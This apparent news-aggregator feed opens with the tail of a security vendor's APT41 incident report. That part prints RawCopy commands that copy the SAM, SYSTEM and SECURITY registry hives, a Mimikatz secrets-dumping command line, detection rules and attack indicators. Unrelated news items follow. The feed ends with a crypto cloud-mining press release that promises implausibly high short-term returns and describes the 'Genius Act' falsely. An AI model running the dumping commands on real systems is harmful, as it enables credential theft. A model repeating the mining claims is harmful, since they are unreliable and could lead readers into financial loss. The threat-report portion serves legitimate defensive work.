    The group attempted to mask their malicious activity by using resources that mimicked legitimate ones to download the HTA file. Specifically, the command above reached out to the GitHub-impersonating domain github[.]githubassets[.]net. The attackers primarily used the site to host JavaScript code. These scripts were responsible for delivering either the next stage of their malware or the tools needed to further the attack.

    At the time of our investigation, a harmless script was being downloaded from github[.]githubassets[.]net instead of a malicious one. This was likely done to hide the activity and complicate attack analysis.

    The harmless script found on github[.]githubassets[.]net

    However, we were able to obtain and analyze previously distributed scripts, specifically the malicious file 2CD15977B72D5D74FADEDFDE2CE8934F. Its primary purpose is to create a reverse shell on the host, giving the attackers a shell for executing their commands.

    Once launched, the script gathers initial host information:

    It then connects to the C2 server, also located at github[.]githubassets[.]net, and transmits a unique ATTACK_ID along with the initially collected data. The script leverages various connection methods, such as WebSockets, AJAX, and Flash. The choice depends on the capabilities available in the browser or execution environment.

    Data collection

    Next, the attackers utilized automation tools such as stealers and credential-harvesting utilities to collect sensitive data. We detail these tools below. Data gathered by these utilities was also exfiltrated via the compromised SharePoint server. In addition to the aforementioned web shell, the SMB protocol was used to upload data to the server. The files were transferred to a network share on the SharePoint server.

    Pillager

    A modified version of the Pillager utility stands out among the tools the attackers deployed on hosts to gather sensitive information. This tool is used to export and decrypt data from the target computer. The original Pillager version is publicly available in a repository, accompanied by a description in Chinese.

    The primary types of data collected by this utility include:

    • Saved credentials from browsers, databases, and administrative utilities like MobaXterm
    • Project source code
    • Screenshots
    • Active chat sessions and data
    • Email messages
    • Active SSH and FTP sessions
    • A list of software installed on the host
    • Output of the systeminfo and tasklist commands
    • Credentials stored and used by the operating system, and Wi-Fi network credentials
    • Account information from chat apps, email clients, and other software

    A sample of data collected by Pillager:

    The utility is typically an executable (EXE) file. However, the attackers rewrote the stealer’s code and compiled it into a DLL named wmicodegen.dll. This code then runs on the host via DLL sideloading. They chose convert-moftoprovider.exe, an executable from the Microsoft SDK toolkit, as their victim application. It is normally used for generating code from Managed Object Format (MOF) files.

    Despite modifying the code, the group didn’t change the stealer’s default output file name and path: C:WindowsTempPillager.zip.

    It’s worth noting that the malicious library they used was based on the legitimate SimpleHD.dll HDR rendering library from the Xbox Development Kit. The source code for this library is available on GitHub. This code was modified so that convert-moftoprovider.exe loaded an exported function, which implemented the Pillager code.

    Interestingly, the path to the PDB file, while appearing legitimate, differs by using PS5 instead of XBOX:

    Checkout

    The second stealer the attackers employed was Checkout. In addition to saved credentials and browser history, it also steals information about downloaded files and credit card data saved in the browser.

    When launching the stealer, the attackers pass it a j8 parameter; without it, the stealer won’t run. The malware collects data into CSV files, which it then archives and saves as CheckOutData.zip in a specially created directory named CheckOut.

    Data collection and archiving in Checkout

    Checkout launch diagram in Kaspersky Threat Intelligence Platform

    RawCopy

    Beyond standard methods for gathering registry dumps, such as using reg.exe, the attackers leveraged the publicly available utility RawCopy (MD5 hash: 0x15D52149536526CE75302897EAF74694) to copy raw registry files.

    RawCopy is a command-line application that copies files from NTFS volumes using a low-level disk reading method.

    The following commands were used to collect registry files:

    c:userspublicdownloadsRawCopy.exe /FileNamePath:C:WindowsSystem32Configsystem /OutputPath:c:userspublicdownloads

    c:userspublicdownloadsRawCopy.exe /FileNamePath:C:WindowsSystem32Configsam /OutputPath:c:userspublicdownloads

    c:userspublicdownloadsRawCopy.exe /FileNamePath:C:WindowsSystem32Configsecurity /OutputPath:c:userspublicdownloads

    Mimikatz

    The attackers also used Mimikatz to dump account credentials. Like the Pillager stealer, Mimikatz was rewritten and compiled into a DLL. This DLL was then loaded by the legitimate java.exe file (used for compiling Java code) via DLL sideloading. The following files were involved in launching Mimikatz:

    C:WindowsTemp123.bat

    C:WindowsTempjli.dll

    C:WindowsTempjava.exe

    С:WindowsTempconfig.ini

    123.bat is a BAT script containing commands to launch the legitimate java.exe executable, which in turn loads the dynamic link library for DLL sideloading. This DLL then decrypts and executes the Mimikatz configuration file, config.ini, which is distributed from a previously compromised host within the infrastructure.

    1

    java.exe privilege::debug token::elevate lsadump::secrets exit

    Retrospective threat hunting

    As already mentioned, the victim organization’s monitoring coverage was initially patchy. Because of this, in the early stages, we only saw the external IP address of the initial source and couldn’t detect what was happening on that host. After some time, the host was finally connected to our monitoring systems, and we found that it was an IIS web server. Furthermore, despite the lost time, it still contained artifacts of the attack.

    These included the aforementioned Cobalt Strike implant located in c:programdata, along with a scheduler task for establishing persistence on the system. Additionally, a web shell remained on the host, which our solutions detected as HEUR:Backdoor.MSIL.WebShell.gen. This was found in the standard temporary directory for compiled ASP.NET application files:

    c:windowsmicrosoft.netframework64v4.0.30319temporary asp.net filesrootdedc22b849ac6571app_web_hdmuushc.dll

    MD5: 0x70ECD788D47076C710BF19EA90AB000D

    These temporary files are automatically generated and contain the ASPX page code:

    The web shell was named newfile.aspx. The screenshot above shows its function names. Based on these names, we were able to determine that this instance utilized a Neo-reGeorg web shell tunnel.

    This tool is used to proxy traffic from an external network to an internal one via an externally accessible web server. Thus, the launch of the Impacket tools, which we initially believed was originating from a host unidentified at the time (the IIS server), was in fact coming from the external network through this tunnel.

    Attribution

    We attribute this attack to APT41 with a high degree of confidence, based on the similarities in the TTPs, tooling, and C2 infrastructure with other APT41 campaigns. In particular:

    • The attackers used a number of tools characteristic of APT41, such as Impacket, WMI, and Cobalt Strike.
    • The attackers employed DLL sideloading techniques.
    • During the attack, various files were saved to C:WindowsTemp.
    • The C2 domain names identified in this incident (s3-azure.com, *.ns1.s3-azure.com, *.ns2.s3-azure.com) are similar to domain names previously observed in APT41 attacks (us2[.]s3bucket-azure[.]online, status[.]s3cloud-azure[.]com).

    Takeaways and lessons learned

    The attackers wield a wide array of both custom-built and publicly available tools. Specifically, they use penetration testing tools like Cobalt Strike at various stages of an attack. The attackers are quick to adapt to their target’s infrastructure, updating their malicious tools to account for specific characteristics. They can even leverage internal services for C2 communication and data exfiltration. The files discovered during the investigation indicate that the malicious actor modifies its techniques during an attack to conceal its activities – for example, by rewriting executables and compiling them as DLLs for DLL sideloading.

    While this story ended relatively well – we ultimately managed to evict the attackers from the target organization’s systems – it’s impossible to counter such sophisticated attacks without a comprehensive knowledge base and continuous monitoring of the entire infrastructure. For example, in the incident at hand, some assets weren’t connected to monitoring systems, which prevented us from seeing the full picture immediately. It’s also crucial to maintain maximum coverage of your infrastructure with security tools that can automatically block malicious activity in the initial stages. Finally, we strongly advise against granting excessive privileges to accounts, and especially against using such accounts on all hosts across the infrastructure.

    Appendix

    Rules

    Yara

    strings:
    $func1 = “FrameworkInitialize” fullword
    $func2 = “GetTypeHashCode” fullword
    $func3 = “ProcessRequest” fullword
    $func4 = “__BuildControlTree”
    $func5 = “__Render__control1”

    $str1 = “FAIL” nocase wide
    $str2 = “Port close” nocase wide
    $str3 = “Port filtered” nocase wide
    $str4 = “DISCONNECT” nocase wide
    $str5 = “FORWARD” nocase wide

    condition:
    uint16(0) == 0x5A4D and
    filesize

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    rule neoregeorg_aspx_web_shell

    {

        meta:

            description = “Rule to detect neo-regeorg based ASPX web-shells”

            author = “Kaspersky”

            copyright = “Kaspersky”

            distribution = “DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM”

        strings:

            $func1 = “FrameworkInitialize” fullword

            $func2 = “GetTypeHashCode” fullword

            $func3 = “ProcessRequest” fullword

            $func4 = “__BuildControlTree”

            $func5 = “__Render__control1”

            $str1 = “FAIL” nocase wide

            $str2 = “Port close” nocase wide

            $str3 = “Port filtered” nocase wide

            $str4 = “DISCONNECT” nocase wide

            $str5 = “FORWARD” nocase wide

            

        condition:

            uint16(0) == 0x5A4D and

            filesize 400000 and

            3 of ($func*) and

            3 of ($str*)

    }

    Sigma

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    title: Service Image Path Start From CMD

    id: faf1e809–0067–4c6f–9bef–2471bd6d6278

    status: test

    description: Detects creation of unusual service executable starting from cmd /c using command line

    references:

        – tbd

    tags:

        – attack.persistence

        – attack.T1543.003

    author: Kaspersky

    date: 2025/05/15  

    logsource:                      

        product: windows        

        service: security

    detection:

        selection:

            EventID: 4697

            ServiceFileName|contains:

                – ‘%COMSPEC%’

                – ‘cmd’

                – ‘cmd.exe’

            ServiceFileName|contains|all:

                –  ‘/c’

                – ‘start’

        condition: selection

    falsepositives:

        – Legitimate

    level: medium

    IOCs

    Files

    2F9D2D8C4F2C50CC4D2E156B9985E7CA
    9B4F0F94133650B19474AF6B5709E773
    A052536E671C513221F788DE2E62316C
    91D10C25497CADB7249D47AE8EC94766
    C3ED337E2891736DB6334A5F1D37DC0F
    9B00B6F93B70F09D8B35FA9A22B3CBA1
    15097A32B515D10AD6D793D2D820F2A8
    A236DCE873845BA4D3CCD8D5A4E1AEFD
    740D6EB97329944D82317849F9BBD633
    C7188C39B5C53ECBD3AEC77A856DDF0C
    3AF014DB9BE1A04E8B312B55D4479F69
    4708A2AE3A5F008C87E68ED04A081F18
    125B257520D16D759B112399C3CD1466
    C149252A0A3B1F5724FD76F704A1E0AF
    3021C9BCA4EF3AA672461ECADC4718E6
    F1025FCAD036AAD8BF124DF8C9650BBC
    100B463EFF8295BA617D3AD6DF5325C6
    2CD15977B72D5D74FADEDFDE2CE8934F
    9D53A0336ACFB9E4DF11162CCF7383A0
    27F506B198E7F5530C649B6E4860C958

    Domains and IPs

    47.238.184[.]9
    38.175.195[.]13
    hxxp://github[.]githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
    hxxp://chyedweeyaxkavyccenwjvqrsgvyj0o1y.oast[.]fun/aaa
    hxxp://toun[.]callback.red/aaa
    hxxp://asd.xkx3[.]callback.[]red
    hxxp[:]//ap-northeast-1.s3-azure[.]com
    hxxps[:]//www[.]msn-microsoft[.]org:2053
    hxxp[:]//www.upload-microsoft[.]com
    s3-azure.com
    *.ns1.s3-azure.com
    *.ns2.s3-azure.com
    upload-microsoft[.]com
    msn-microsoft[.]org

    MITRE ATT&CK

    Tactic Technique ID
    Initial Access Valid Accounts: Domain Accounts T1078.002
    Exploit Public-Facing Application T1190
    Execution Command and Scripting Interpreter: PowerShell T1059.001
    Command and Scripting Interpreter: Windows Command Shell T1059.003
    Scheduled Task/Job: Scheduled Task T1053.005
    Windows Management Instrumentation T1047
    Persistence Create or Modify System Process: Windows Service T1543.003
    Hijack Execution Flow: DLL Side-Loading T1574.002
    Scheduled Task/Job: Scheduled Task T1053.005
    Valid Accounts: Domain Accounts T1078.002
    Web Shell T1505.003
    IIS Components T1505.004
    Privilege Escalation Create or Modify System Process: Windows Service T1543.003
    Hijack Execution Flow: DLL Side-Loading T1574.002
    Process Injection T1055
    Scheduled Task/Job: Scheduled Task T1053.005
    Valid Accounts: Domain Accounts T1078.002
    Defense Evasion Hijack Execution Flow: DLL Side-Loading T1574.002
    Deobfuscate/Decode Files or Information T1140
    Indicator Removal: File Deletion T1070.004
    Masquerading T1036
    Process Injection T1055
    Credential Access Credentials from Password Stores: Credentials from Web Browsers T1555.003
    OS Credential Dumping: Security Account Manager T1003.002
    Unsecured Credentials T1552
    Discovery Network Service Discovery T1046
    Process Discovery T1057
    System Information Discovery T1082
    System Network Configuration Discovery T1016
    Lateral movement Lateral Tool Transfer T1570
    Remote Services: SMB/Windows Admin Shares T1021.002
    Collection Archive Collected Data: Archive via Utility T1560.001
    Automated Collection T1119
    Data from Local System T1005
    Command and Control Application Layer Protocol: Web Protocols T1071.001
    Application Layer Protocol: DNS T1071.004
    Ingress Tool Transfer T1105
    Proxy: Internal Proxy T1090.001
    Protocol Tunneling T1572
    Exfiltration Exfiltration Over Alternative Protocol T1048
    Exfiltration Over Web Service T1567

    MIL OSI Global Banks –

    July 21, 2025
  • MIL-OSI Banking: Historic Ju 52 on its way to the Lufthansa Group Conference and Visitor Center

    Source: Lufthansa Group

    The Junkers Ju 52 will move to the newly built Lufthansa Group Conference and Visitor Center in the coming weeks. The historic aircraft, affectionately known as “Aunt Ju,” was officially bid farewell in Paderborn-Lippstadt, where it had been stationed since 2020 for restoration by the Quax Association. The aircraft remains the property of the Deutsche Lufthansa Berlin Stiftung (DLBS) and will be on display in Frankfurt from 2026, just in time for the 100th anniversary of the founding of the first Lufthansa.

    At a farewell ceremony in Paderborn, the Lufthansa Group paid tribute to the support provided by the Quax Association and Paderborn Airport over many years for both the Ju 52 and the Lockheed Super Star. The Quax Association will also continue to maintain two other DLBS aircraft, a Dornier Do 27 and a Messerschmitt Bf 108, in Paderborn.

    Wolfgang von Richthofen, Project Manager of the Lufthansa Group Conference and Visitor Center: “With our Ju 52, we are preserving the history of Lufthansa and aviation. The historic aircraft will enrich the exhibition in our new visitor center as an essential exhibit and will be accessible to customers, employees, aviation enthusiasts, and the general public.”

    Werner Knorr, CEO of DLBS: “The departure from Paderborn is not a final farewell, but the beginning of a new chapter for the Ju 52, one that honors its history and significance for aviation.”

     

    The Junkers Ju 52

    The Ju 52 has had an eventful history with Lufthansa. Since its introduction in the 1930s, it has become a symbol of aviation. The Junkers Ju 52 was added to the Lufthansa fleet in 1932 and quickly became the backbone of the aircraft fleet. It accounted for around 50 percent of the fleet and was valued for its reliability and economy. Originally designed as a single-engine aircraft, it was later developed into a three-engine model that was characterized by its robust construction and ease of maintenance.

     

    The Lufthansa Group Conference and Visitor Center

    In the immediate vicinity of the Lufthansa Aviation Center (LAC), the Lufthansa Group has begun construction of a new conference and visitor center at Frankfurt Airport in 2024. It will be a place for new forms of collaboration for employees and, at the same time, for customers, business partners, and aviation enthusiasts.

    Lufthansa’s pioneering spirit and expertise will be tangible – especially in shaping the future of aviation, but also in relation to the company’s history. The main historical attractions will be two restored Lufthansa aircraft on permanent display: the Junkers Ju 52 (D-AQUI) and, for the first time, the legendary Lockheed Super Star with the registration D-ALAN, which is currently being painted at Münster-Osnabrück Airport. Thanks to a large transparent façade, both aircraft will also be visible from a distance.

    Visitors will be able to explore numerous exhibits from Lufthansa’s corporate history in an open gallery, some of which will be on public display for the first time. Like the Group’s training and conference hotel, “Lufthansa Seeheim,” the Frankfurt conference and visitor center will also be open for external events and will offer visitors culinary delights in a coffee lounge.

    MIL OSI Global Banks –

    July 21, 2025
  • MIL-OSI United Kingdom: Appointment to the Criminal Procedure Rule Committee: July 2025

    Source: United Kingdom – Government Statements

    News story

    Appointment to the Criminal Procedure Rule Committee: July 2025

    The Lord Chancellor, after consulting the Lady Chief Justice, has approved the appointment of Bartholomew Dalton as a solicitor member of the Criminal Procedure Rule Committee, for 4 years from 1 September 2025.

    Bartholomew Dalton is a solicitor and key member of the Serious and General Crime team at top-ranked London criminal defence firm Hickman & Rose.

    He has represented clients accused of a wide range of offences and provides expert advice in relation to all stages of criminal cases, from investigation through to trial and appeal. He is an experienced police station representative, litigator and advocate in the Magistrates’ Court and litigator in the Crown Court. He is recommended as an “associate to watch” in Chambers & Partners and as a “key lawyer” in the Legal 500.

    Mr Dalton is the co-author of the 2 most recent editions of the leading practitioners’ handbook Blackstone’s Magistrates’ Court Handbook, published by Oxford University Press, and is currently working on the next edition. He is also a member of Criminal Law Week’s commentary board and a committee member and the law reform officer for the London Criminal Courts Solicitors’ Association.

    Mr Dalton qualified as a solicitor in 2017 before joining Hickman & Rose in 2021.

    The Courts Act 2003 established the Criminal Procedure Rule Committee (CPRC) to make rules and governing the practice and procedure of magistrates’ courts, the Crown Court and the Court of Appeal, Criminal Division.

    Appointments are made, by the Lord Chancellor, under the Courts Act 2003, and are regulated by the Commissioner for Public Appointments. This appointment has been made in line with the Governance Code on Public Appointments.

    Share this page

    The following links open in a new tab

    • Share on Facebook (opens in new tab)
    • Share on Twitter (opens in new tab)

    Updates to this page

    Published 21 July 2025

    MIL OSI United Kingdom –

    July 21, 2025
  • MIL-OSI Russia: Total number of internet users in China exceeds 1.12 billion people /detailed version-1/

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    BEIJING, July 21 (Xinhua) — The number of internet users in China will reach more than 1.12 billion as of June 2025, according to a report released Monday by the China Internet Information Center.

    The document also notes that by the end of June 2025, the internet penetration rate in China will reach 79.7 percent, an increase of 1.1 percentage points compared to December 2024.

    According to the report, China has made significant progress in internet development during the 14th Five-Year Plan period (2021-2025). In particular, efforts to expand internet access have enabled key groups such as the elderly and those living in rural areas to benefit from this progress.

    As of June 2025, the number of internet users aged 60 and above in China reached 161 million, while the number of internet users in rural areas reached 322 million. Moreover, the internet penetration rate among these two groups of the Chinese population reached 52% and 69.2%, respectively.

    Meanwhile, China’s continued internet development has played a key role in promoting Chinese culture both domestically and abroad, the report said, highlighting the booming expansion of Chinese online literature and games into overseas markets and the deepening integration between popular web series and related tourism destinations. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI Russia: Hunchun checkpoint becomes “golden corridor” for import of king crabs from Russia

    Translation. Region: Russian Federal

    Source: People’s Republic of China in Russian – People’s Republic of China in Russian –

    An important disclaimer is at the bottom of this article.

    Source: People’s Republic of China – State Council News

    BEIJING, July 21 (Xinhua) — Trucks loaded with king crabs and other seafood line up at the Hunchun port in northeast China’s Jilin Province in the height of summer to clear customs before entering China.

    Truck driver Chen Chen said he can transport up to four tons of king crabs at a time.

    According to the Zhongxinshe news agency, more than 1.5 million units of Kamchatka crabs from Russia are imported into China through the Hunchun checkpoint every year, which accounts for about 80 percent of the country’s total market. Hunchun has truly become a key gateway for China to import this seafood delicacy.

    With the continuous improvement of cross-border logistics and transportation efficiency in recent years, Russian-produced Kamchatka crabs have become part of the daily life of Chinese people.

    Over the past decade, Kamchatka crabs have been sold not only in northeast China, but also served on tables in major cities such as Beijing, Shanghai, Guangzhou and Shenzhen.

    To meet the high market demand, Hunchun City also focused on promoting the Northeast Asia Fresh Seafood Park project with a total investment of over 600 million yuan (about 83.6 million US dollars).

    The park will not only be used for temporary storage of imported seafood, but also to stimulate the development of processing trade to build an important hub for processing and distributing fresh seafood in northern China, said Liu Yansong, head of the park.

    Now tasting king crabs has become a tourist specialty of Hunchun.

    Previously, imported Russian king crabs had to be transported to China via Busan, a city in the southeast of the Republic of Korea. After Hunchun was approved as a specialized checkpoint for importing chilled seafood and edible aquatic animals, this “golden corridor” for importing king crabs into the country was opened. In addition, the Kamchatka-Zarubino-Hunchun route made the transportation of aquatic products between China and Russia more stable and uninterrupted.

    To ensure the freshness of imported seafood, Hunchun Customs has opened a “green channel” to provide inspection and release services by appointment all year round and around the clock, speeding up customs clearance.

    In recent years, Chinese consumers’ interest in Russian Kamchatka crabs has grown rapidly. According to the General Administration of Customs of China, the total value of China’s imports of live, fresh and frozen crabs from Russia exceeded US$1.14 billion last year, up 16.7 percent from the previous year. -0-

    Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.

    .

    MIL OSI Russia News –

    July 21, 2025
  • MIL-OSI United Nations: Gaza Convoy Incident Statement

    Source: World Food Programme

    On the morning of 20 July, a 25 truck WFP convoy carrying vital food assistance crossed the Zikim border point destined for starving communities in northern Gaza.

    Shortly after passing the final checkpoint beyond the Zikim crossing point into Gaza, the convoy encountered large crowds of civilians anxiously waiting to access desperately needed food supplies.

    As the convoy approached, the surrounding crowd came under fire from Israeli tanks, snipers and other gunfire.

    We are deeply concerned and saddened by this tragic incident resulting in the loss of countless lives. Many more suffered life-threatening injuries. These people were simply trying to access food to feed themselves and their families on the brink of starvation. This terrible incident underscores the increasingly dangerous conditions under which humanitarian operations are forced to be conducted in Gaza.  

    Today’s violent incident comes despite assurances from Israeli authorities that humanitarian operational conditions would improve; including that armed forces will not be present nor engage at any stage along humanitarian convoy routes. 

    There should never, ever, be armed groups near or on our aid convoys, as reiterated on many occasions to all parties to the conflict. Shootings near humanitarian missions, convoys and food distributions must stop immediately. Any violence involving civilians seeking humanitarian aid is completely unacceptable. 

    We stand firmly by our principles of operating with independence, impartiality and neutrality. It is one of the many reasons why communities trust us. 

    The World Food Programme continues to call for the protection of all civilians and aid workers delivering life-saving assistance. WFP teams accompanying convoys should not have to risk their own lives in the effort to save others. Without these fundamental conditions in place, we cannot continue providing life-saving support across the Gaza strip.

    Gaza’s hunger crisis has reached new levels of desperation. People are dying from lack of humanitarian assistance. Malnutrition is surging with 90,000 women and children in urgent need of treatment. Nearly one person in three is not eating for days. Food aid is the only way for most people to access any food – as the cost of a one-kilogram bag of flour has surged to over USD100 in local markets.

    Only a massive scale-up in food aid distributions can stabilize this spiraling situation, calm anxieties and rebuild the trust within communities that more food is coming.

    An agreed ceasefire is long overdue. All hostages should be released, and humanitarians should be able to reach the civilian population in Gaza with critical food supplies in a consistent, predictable, orderly and safe manner — wherever they are across the Gaza Strip. 

    WFP is ready. We have food supplies nearby, experienced teams on the ground, and proven systems in place to respond at scale. We did it before and we can do it again.

    We urgently call on the international community and all parties to advocate for, and facilitate, the delivery of life-saving food aid to starving populations inside Gaza – safely, securely, wherever families are, and without obstruction.

    MIL OSI United Nations News –

    July 21, 2025
  • MIL-OSI Europe: ASIA/BANGLADESH – Political and social tensions as the country heads toward general elections

    Source: Agenzia Fides – MIL OSI

    Dhaka (Agenzia Fides) – Clashes between supporters of political parties have once again created social instability in Bangladesh. Tensions have flared in recent days in the city of Gopalganj, south of Dhaka, where members of the Awami League, the party of former Prime Minister Sheikh Hasina, who has fled abroad, attacked the march of activists from the National Citizen Party, the student party that officially presented itself to voters in early 2025.Following the clashes in Gopalganj, the government imposed a curfew to regain control of the situation, while four people died and 13 were injured in clashes with police.Social tensions are flaring up again as the country nears the finish line of the next general elections, which the interim government Muhammad Yunus, after considerable domestic and international pressure, has announced will be held in April 2026.Sheikh Hasina is currently in India and has been tried for the repression of protesters during the student protests that, in August 2024, brought an end to her 15-year rule. Hasina has been accused of ordering police to fire on protesters (there were numerous casualties), while the exiled leader maintains that the accusations against her are politically motivated.Meanwhile, the Awami League has been banned in Bangladesh, pending the outcome of the trial. The party was barred from participating in the elections after the Election Commission suspended its registration. The measure has exacerbated social polarization and tensions.Meanwhile, the consequences of the collapse of the industrial sector are being felt in the country, with a significant drop in foreign investment, steadily rising inflation, and ever-rising costs for basic goods. “A sense of frustration is growing among people, which could have repercussions in the voting process,” notes a local Fides source in the Catholic community.In a country with 170 million inhabitants, the vast majority of whom are Muslim, Christians and other religious minorities have expressed concern about the return of radical Islamic parties to the political scene. Indeed, Bangladesh’s Supreme Court has overturned the ban on the country’s main Muslim party, which for more than ten years had been relegated to the margins of society by the government of former Prime Minister Sheikh Hasina. Jamaat-e-Islami will now be able to participate in the next general elections and is preparing to broaden its base of political consensus. The danger, highlighted especially by civil society organizations and associations, is the influence that Islamist parties could have on the country’s future government. Therefore, the interim government has been asked to complete the process of constitutional reforms before the elections, defining an institutional and legal framework based on the principles of democracy, pluralism, and equality. (PA) (Agenzia Fides, 19/7/2025)
    Share:

    MIL OSI Europe News –

    July 21, 2025
  • MIL-OSI Europe: AFRICA/TANZANIA – School, vegetable gardens, and livestock farming: the Consolata Missionaries teach a trade to young girls in difficult situations

    Source: Agenzia Fides – MIL OSI

    Saturday, 19 July 2025

    missionariedellaconsolata.org

    Iringa (Agenzia Fides) – Learning to care for animals on a farm to create a livestock farm and cultivate vegetable gardens to sell the produce at the market. This is the new objective of the “House of Joy,” a facility run by the Consolata Missionary Sisters located on the outskirts of the city of Iringa, Tanzania.Here, the sisters welcome young girls from families in difficulty or who are alone in the world because they are orphans. The minors have the opportunity to attend school until they finish secondary school. The missionaries support their guests until they find decent work.This is why, upon their arrival at the facility, the girls are introduced to manual labor and gardening, as is the case in many Tanzanian families. However, sometimes this is not enough. Thus, to cover expenses and offer new employment opportunities to the girls, a new project was launched last year and has been able to come to fruition in recent weeks thanks to donations from several benefactors.The “House of Joy” now also houses an animal farm: chickens, rabbits, and pigs. Thanks to this farm, the community is beginning to meet its own needs in terms of meat and eggs. The girls also care for the animals and will, in time, be able to find employment in the zootechnical sector. (F.B.) (Agenzia Fides, 19/7/2025)
    Share:

    MIL OSI Europe News –

    July 21, 2025
  • MIL-OSI: The Genius Act Fuels XRP Cloud Mining Innovation Through ALL4 Mining’s Eco-Friendly Platform

    Source: GlobeNewswire (MIL-OSI)

    New York City, NY, July 21, 2025 (GLOBE NEWSWIRE) — The blockchain industry is rapidly evolving, with regulatory frameworks and technological innovations driving new ways to participate in digital asset mining and investment. One of the recent milestones driving this change is the Genius Act, which aims to promote sustainable and inclusive growth of blockchain technology. ALL4 Mining has seized this opportunity to integrate XRP mining capabilities into its cloud platform, creating new opportunities for investors seeking low-barrier, environmentally friendly and stable returns.

    What Is the Genius Act?

    The Genius Act—short for Global Economic Nexus for Inclusive Utility and Sustainability—is a progressive law that encourages blockchain innovation while emphasizing environmental responsibility and user protection. It aims to reduce regulatory obstacles, foster green mining practices, and support scalable cryptocurrencies with proven efficiency and compliance.
    This framework opens doors for platforms to adopt clean energy-powered mining solutions, ensuring crypto investment can grow without the high energy costs and environmental concerns traditionally linked to mining.

    ALL4 Mining: Transforming Cryptocurrency Mining

    raditional cryptocurrency mining often demands expensive hardware, technical know-how, and enormous energy consumption, making it inaccessible to many investors. ALL4 Mining revolutionizes this by offering a cloud mining system that relies on distributed computing power and renewable energy. Users lease computing power contracts instead of buying physical equipment, significantly lowering entry barriers.
    The platform’s architecture consists of multiple eco-friendly data centers that handle the mining operations remotely. This setup makes mining more flexible, cost-effective, and environmentally sustainable—aligned perfectly with the Genius Act’s objectives.

    Why XRP Mining Matters in This Context

    XRP is a standout cryptocurrency known for its fast transaction speeds, low fees, and high scalability. It is also recognized for its comparatively low energy consumption, which makes it ideal for eco-conscious investors and platforms aiming for sustainability.
    ALL4 Mining’s integration of XRP mining contracts is a strategic move to combine XRP’s advantages with the Genius Act’s environmental mandates. This enables users to mine XRP in a way that is simple, legal, and aligned with the growing global demand for green financial products
    How ALL4 Mining Works with XRP
    ALL4 Mining simplifies mining through cloud computing power leasing. Here’s how users can get started:
    1.Register an Account: New users receive a $15 welcome bonus, encouraging easy entry into the platform.
    2.Choose a Contract: Select from a variety of XRP computing power contracts tailored to different investment levels.
    3.Start Mining: The system automatically mines XRP on your behalf, with daily income credited directly to your account.
    4.Monitor Earnings: Real-time dashboards provide full transparency and allow users to track performance anytime.
    This structure removes the complexities of traditional mining, making XRP accessible to individual miners, small businesses, and larger mining pools alike.

    Contract Packages Tailored to Investors

    ALL4 Mining offers a range of mining contracts not only for XRP but also for other major cryptocurrencies, allowing investors flexibility and choice:

    BTC basic computing power: investment amount: $100, contract period: 2 days, daily income of $4.0, expiration income: $100 + $8

    LTC [classic computing power contract]: investment amount: $600, contract period: 6 days, daily income of $7.2, expiration income: $600 + $43.2

    BTC [classic computing power contract]: investment amount: $3,000, contract period: 20 days, daily income of $42, expiration income: $3,000 + $840

    DOGE [classic computing power contract]: investment amount: $5,000, contract period: 31 days, daily income of $74, expiration income: $5,000 + $2,294

    BTC [advanced computing power contract]: investment amount: $10,000, contract period: 40 days, daily income of $170, expiration income: $10,000 + $680

    BTC [advanced computing power contract]: investment amount: 50,000 USD, contract period: 48 days, daily income: USD 930, maturity income: USD 50,000 + USD 44,640

    BTC [Super Computing Power Contract]: Investment amount: USD 150,000, contract period: 45 days, daily income: USD 3,000, maturity income: USD 150,000 + USD 135,000

    Large-scale investors can explore premium packages, such as $300,000 contracts, which deliver over $288,000 in profits in just 40 days.

    Such diversity allows investors to customize their mining participation according to risk tolerance and financial goals.

    Environmental and Security Benefits

    One of the Genius Act’s core tenets is to encourage mining platforms to reduce their environmental impact. ALL4 Mining delivers on this by powering its data centers with renewable energy sources, significantly lowering the carbon footprint compared to traditional mining farms.
    Furthermore, the platform employs advanced SSL encryption and cybersecurity protocols, safeguarding user data and assets. Its commitment to regulatory compliance offers investors legal peace of mind, which is increasingly important in today’s dynamic crypto regulatory landscape.

    The Broader Impact: Making Crypto Mining Inclusive and Profitable
    The Genius Act and ALL4 Mining’s XRP integration jointly contribute to making cryptocurrency mining more accessible, affordable, and responsible. By eliminating the need for costly hardware and reducing energy consumption, the platform enables a broader audience to participate in mining activities.
    For XRP enthusiasts and investors, this is particularly promising. XRP’s growing use in cross-border payments and financial services means that mined tokens can be utilized or traded in a vibrant market with strong liquidity. Coupled with ALL4 Mining’s user-friendly platform, mining XRP becomes not just a technical exercise but a practical investment opportunity.

    How to Start Your XRP Mining Journey

    To begin mining XRP with ALL4 Mining, users simply:
    · Visit the official website and create an account.
    · Choose a contract that fits their budget and investment strategy.
    · Enjoy daily passive income as the platform’s cloud infrastructure mines XRP on their behalf.
    · Access customer support 24/7 for any assistance.
    The platform’s flexibility ensures that investors can start small and scale their mining power as confidence and experience grow.

    Conclusion

    The Genius Act has created a regulatory environment that encourages sustainable blockchain innovation and reduces barriers for crypto investors. ALL4 Mining’s integration of XRP mining under this framework offers a pioneering solution that is efficient, secure, and environmentally responsible.
    By combining XRP’s technical strengths with ALL4 Mining’s advanced cloud infrastructure, investors gain access to a low-cost, high-yield, and eco-friendly mining platform. This synergy not only supports financial inclusion but also sets a new standard for how digital assets should be mined in the modern era.

    For those interested in tapping into XRP’s potential through cloud mining, ALL4 Mining stands out as a trusted and forward-looking choice—built for the future of cryptocurrency.
    For more information and to start mining XRP today, visit: https://all4mining.com/
    For direct Questions Please Email: info@all4mining.com

    Attachment

    • All4 mining

    The MIL Network –

    July 21, 2025
